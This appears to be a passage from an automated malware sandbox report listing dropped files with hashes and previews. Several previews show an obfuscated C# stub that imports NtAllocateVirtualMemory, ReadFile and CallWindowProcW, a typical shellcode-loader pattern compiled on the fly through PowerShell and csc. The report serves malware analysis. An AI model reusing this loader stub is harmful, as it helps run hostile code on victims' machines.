                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
                          Category:dropped
                          Size (bytes):1340
                          Entropy (8bit):3.997687749422604
                          Encrypted:false
                          SSDEEP:24:H+K9oT6tXpzfHlwKvvfeI+ycuZhNHqakSmbPNnqSed:8TUXVmKXm1ulHqa3mRqS+
                          MD5:19F939220E8C0D444710688009BD2B84
                          SHA1:FF1CBC009250670A8C59987E81BE8085FADF1A1F
                          SHA-256:31F454387F2E7A0C4E7CDB7E71E3A5A9692E4AD98B85F1C659A85712A64FFB19
                          SHA-512:D93BA791E9F73C7B96AAC88E8BD1DAC356D28000A972B171747B2B0BE25412D7A31BF756DB93411E441F7D40F78C468956F54F9B0135FE5F7E465E8729BD9377
                          Malicious:false
                          Preview: L....s.a.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........I....c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP..................WfIB..A..9p^.x............5.......C:\Users\user\AppData\Local\Temp\RES34E6.tmp.-.<....................a..Microsoft (R) CVTRES.p.=..cwd.C:\windows\SysWOW64\WindowsPowerShell\v1.0.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.o.t.c.k.r.0.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                          C:\Users\user\AppData\Local\Temp\RES728B.tmp
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
                          Category:dropped
                          Size (bytes):1340
                          Entropy (8bit):4.039517593581453
                          Encrypted:false
                          SSDEEP:24:HOK9oZLGMVTeKxfHOwKvvfeI+ycuZhN7BakS6mPNnqSed:sZLGUC0NKXm1ulFa3ZqS+
                          MD5:8A2F0480250DC7E02EFE84718539C016
                          SHA1:0463680A5FE7017561257513B7BB43EE8B20DECF
                          SHA-256:A9DDF0A8FB1858D58345FF7554CFD0F0BB1E5CB264A1A952C657D9B44A8D8660
                          SHA-512:E1D40BA6442918C3505F7D5C7D2CE3B29A99CB1A42DDE707E334D0108465D1EA7B8F3FCEEB264BF1FB715DCD0EA023B0FCF13E26D1C5E017572CF00C4361417E
                          Malicious:false
                          Preview: L.../s.a.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP................&.%.....2.O.7.............5.......C:\Users\user\AppData\Local\Temp\RES728B.tmp.-.<....................a..Microsoft (R) CVTRES.p.=..cwd.C:\windows\SysWOW64\WindowsPowerShell\v1.0.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.y.b.s.2.g.q.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                          C:\Users\user\AppData\Local\Temp\RESD18D.tmp
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols
                          Category:dropped
                          Size (bytes):1324
                          Entropy (8bit):3.9622757001598075
                          Encrypted:false
                          SSDEEP:24:HZzg691XGFZtHOwKTFpmfwI+ycuZhNQakSsPNnqSud:tzXGFZtNKTzmo1ulQa38qSu
                          MD5:1359F94783A54D08D8FF485A0B920E85
                          SHA1:EC42084022240CA9FD6B93699AB6285B56E0C0AD
                          SHA-256:34DF8CDE736454A68C5289F172A2145051D0496ED2E3129FC8C3B533202B61D4
                          SHA-512:E4EFA34D65D59E3230764012AD3C0594C1466567545EFDC6D208B81235197945964694D3FC598789C9B085648834F41AAA5A579229E4B08A581A27474B8103F0
                          Malicious:false
                          Preview: L....r.a.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........L....c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP.................=....`...bqe.<..........5.......C:\Users\user\AppData\Local\Temp\RESD18D.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.l.a.4.k.v.b.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ziegzhu.r2z.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xwfdi1y.d45.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0z3ml3q.bjh.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii1ag2th.hcn.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2nymaw1.wkd.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmlvvt2e.lbt.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwqfouut.cdz.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwszr1gg.pp5.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3yige21.53a.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbzy0giw.xe5.ps1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview: # PowerShell test file to determine AppLocker lockdown mode
                          C:\Users\user\AppData\Local\Temp\mla4kvb3.0.cs
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):725
                          Entropy (8bit):5.247788193967032
                          Encrypted:false
                          SSDEEP:12:V/DGrUoWvLIhqivuBdiVtKMCArOP+VI9yKTx+RPtyuwQiP2k9oJIzj:JoU5vLIoMuBduECN6LgFP+D
                          MD5:C659BB6BE2FF2787E6E6B54020DF3923
                          SHA1:52E0AD44AECE711701787842C58923DC2440A897
                          SHA-256:8E481A83663E722657B2E2A38C00D887FCCDEE5DDA5B2A93BC127F087C805010
                          SHA-512:49F43389059EFC61272F2EC95654454E04781C86F337D1C2B29B8E9666ADCA6C011D8B4C373FAAB16EB12665813CEA0E86AA6D2D3B67CEF3E76845F2D631637D
                          Malicious:false
                          Preview: .using System;..using System.Runtime.InteropServices;..public static class Opisthoc31..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);..[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);..}
                          C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):353
                          Entropy (8bit):5.2519804524771825
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fOi10zxs7+AEszICN23fOidx:p37Lvkmb6Km510WZE75P
                          MD5:3A2EE53753BB2E779C510AC04F8C4F8D
                          SHA1:F359D5A7D065708E02D1E697B26138687CD48809
                          SHA-256:0380D3287B80FF4A26C4EE700E3F16472EFCA76F27865CF5BAB9D382FC5E25C1
                          SHA-512:BA2F7E32EC6EDF7AE14CEEF18771166E1935BA9188268AAE839A31164F6835C4F4CA0C685729CE0C740B78FF72666D5FE61C94636A2DBD75026914ED01C128AD
                          Malicious:true
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mla4kvb3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mla4kvb3.0.cs"
                          C:\Users\user\AppData\Local\Temp\mla4kvb3.dll
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):3.195584992610436
                          Encrypted:false
                          SSDEEP:48:6lPvc0gLTeVlojCkFy79Jg2D1ulQa38q:MvcPeVz9JmeK
                          MD5:0C1E20214334E9D3CED0ABDD074C7DB5
                          SHA1:8939BEFF6C7725EB62754B9B4E5489C6B7C7F770
                          SHA-256:59FF3F8F5384A62B12CDFDF1DDE29F4E18B3E43867D72439CDE7CC51EAC9653E
                          SHA-512:5531D454C60B4F1100723413084C0B3D7F6E7F5BFAE5C5B332FBE4442520F2E94315505F417C3AFF59E5B629C131568C857D0E7E408983B723DD53EB856A2C45
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r.a...........!................^%... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings....<.......#US.D.......#GUID...T...l...#Blob...........G.........%3............................................................2.+...{.[.....[.......................................... 9............ Q............ ].!.......... f.+.......v...........................................................................................................$.
                          C:\Users\user\AppData\Local\Temp\mla4kvb3.out
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):852
                          Entropy (8bit):5.303864639689193
                          Encrypted:false
                          SSDEEP:24:KSqd3ka6Km5LE752Kax5DqBVKVrdFAMBJTH:dika6P5LE752K2DcVKdBJj
                          MD5:8685AD61A88330CA1B9793B3E19BF14F
                          SHA1:122347D2429AF18424571ACB0042F8AD4452D502
                          SHA-256:7A7C4B0E8CE7343A155C58CB2A970895BDEEE261EBAA96742A66098F383F5605
                          SHA-512:CB9E5BF2E319DE448CDCD7F13B2979913DB68F1F189E445BFA8E9535EF1BF5EE44A87CC769243EF6866558286DF18F3CAB9F1875F9E707F87C5CBF7D1E7F4E20
                          Malicious:false
                          Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mla4kvb3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mla4kvb3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\uotckr0j.0.cs
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):725
                          Entropy (8bit):5.247788193967032
                          Encrypted:false
                          SSDEEP:12:V/DGrUoWvLIhqivuBdiVtKMCArOP+VI9yKTx+RPtyuwQiP2k9oJIzj:JoU5vLIoMuBduECN6LgFP+D
                          MD5:C659BB6BE2FF2787E6E6B54020DF3923
                          SHA1:52E0AD44AECE711701787842C58923DC2440A897
                          SHA-256:8E481A83663E722657B2E2A38C00D887FCCDEE5DDA5B2A93BC127F087C805010
                          SHA-512:49F43389059EFC61272F2EC95654454E04781C86F337D1C2B29B8E9666ADCA6C011D8B4C373FAAB16EB12665813CEA0E86AA6D2D3B67CEF3E76845F2D631637D
                          Malicious:false
                          Preview: .using System;..using System.Runtime.InteropServices;..public static class Opisthoc31..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);..[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);..}
                          C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):353
                          Entropy (8bit):5.2451823234385815
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23f7dGzxs7+AEszICN23f7dV9:p37Lvkmb6KmRGWZE7Rb
                          MD5:D202492A8D55F6064EBA82FC0EA765B1
                          SHA1:6FB32C99A5F3902082142D6EFB5DCF059DDED633
                          SHA-256:5F853B8F5834E884B3AEDF10EB6A0B6BE5BCB61D922CBE7BBBFE643798BF35AC
                          SHA-512:980CE5AFA96E39DFC801AE70772ED2FC334E2F271AA65B28815CA8B6E53F9DB9A5343EB1663FED47405ACB24942BAECFEB3A3077914E435E6840D1DEDECA20D6
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uotckr0j.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uotckr0j.0.cs"
                          C:\Users\user\AppData\Local\Temp\uotckr0j.dll
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):3.1901992072925816
                          Encrypted:false
                          SSDEEP:24:etGSwtoDTc8cF7ertlCLxV0uv0lojsxptkFU9JEloWI+ycuZhNHqakSmbPNnq:6VPvc0gLolojCkFU9JElD1ulHqa3mRq
                          MD5:27B08E154E713C8A84ADEEC4FB8095BB
                          SHA1:3E94A13302443C1F343EB55D2F8FC1293319A87D
                          SHA-256:BED67E04B0BCDBB994B01389C6E6A4A3279C342EC9B8E2B9447DC400E865472B
                          SHA-512:6500EB68A790BE76A84D5EBB29DFB3C781CC706610EF85F13FD167563F256D8D99A2FE806E72A63B0AE329E82EA27BB21EA056523ACFAB43EDC9661D73A4FFAB
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.a...........!................^%... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings....<.......#US.D.......#GUID...T...l...#Blob...........G.........%3............................................................2.+...{.[.....[.......................................... 9............ Q............ ].!.......... f.+.......v...........................................................................................................$.
                          C:\Users\user\AppData\Local\Temp\uotckr0j.out
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):871
                          Entropy (8bit):5.335126647714771
                          Encrypted:false
                          SSDEEP:24:7rqd3ka6KmVE7UKax5DqBVKVrdFAMBJTH:/ika6PVE7UK2DcVKdBJj
                          MD5:3D5E6CFA534E5F8DD3D660AAF885617E
                          SHA1:AAD6349AF3810BB0AE8DC24BAC64CB5A53108008
                          SHA-256:4E22FAE7D1A966B7DBDA6B35098BB5A6F9D7DA7DA9319DC1C87A4A3BFA6AA33D
                          SHA-512:CC613BF24154F4726124DE473EE8A9B39A9A0A0E5D09F73C6912E7126286CB78A1FF016DA24A16ABD736DA1C50E7A9A1404304ED149DF89A7E6C8CF2ECDB0D74
                          Malicious:false
                          Preview: .C:\windows\SysWOW64\WindowsPowerShell\v1.0> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uotckr0j.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uotckr0j.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\vybs2gqu.0.cs
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):725
                          Entropy (8bit):5.247788193967032
                          Encrypted:false
                          SSDEEP:12:V/DGrUoWvLIhqivuBdiVtKMCArOP+VI9yKTx+RPtyuwQiP2k9oJIzj:JoU5vLIoMuBduECN6LgFP+D
                          MD5:C659BB6BE2FF2787E6E6B54020DF3923
                          SHA1:52E0AD44AECE711701787842C58923DC2440A897
                          SHA-256:8E481A83663E722657B2E2A38C00D887FCCDEE5DDA5B2A93BC127F087C805010
                          SHA-512:49F43389059EFC61272F2EC95654454E04781C86F337D1C2B29B8E9666ADCA6C011D8B4C373FAAB16EB12665813CEA0E86AA6D2D3B67CEF3E76845F2D631637D
                          Malicious:false
                          Preview: .using System;..using System.Runtime.InteropServices;..public static class Opisthoc31..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Opisthoc36,ref Int32 Eucai5,int KURERENIN,ref Int32 Opisthoc3,int Metr5,int Opisthoc37);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DOBBE,uint Omprogramm2,int jackpotd,int Opisthoc30,int Metasy,int Trontaler,int Spndesk3);..[DllImport("kernel32.dll")]public static extern int ReadFile(int KURERENIN0,uint KURERENIN1,IntPtr KURERENIN2,ref Int32 KURERENIN3,int KURERENIN4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr KURERENIN5,int KURERENIN6,int KURERENIN7,int KURERENIN8,int KURERENIN9);..}
                          C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):353
                          Entropy (8bit):5.27600376148969
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fvzxs7+AEszICN23fqn:p37Lvkmb6Km3WZE7yn
                          MD5:124F0E3E1FE5E1329939F92911373156
                          SHA1:F54C73C2AFB6DAC4EB731A43245A2270CC25FCD7
                          SHA-256:A0B3B2DDB218D50C61543369045919C84488761E282358F2919734D856CE6DF2
                          SHA-512:4E19E7E6F198FF73DE03D98855BB180A70D02352F87D6E15EB399B6A469E2F708B2D6A14D67D4F1C71CB4F16DD884E99C0B22F8BE4696BB19291F3FA1AB32CD3
                          Malicious:false
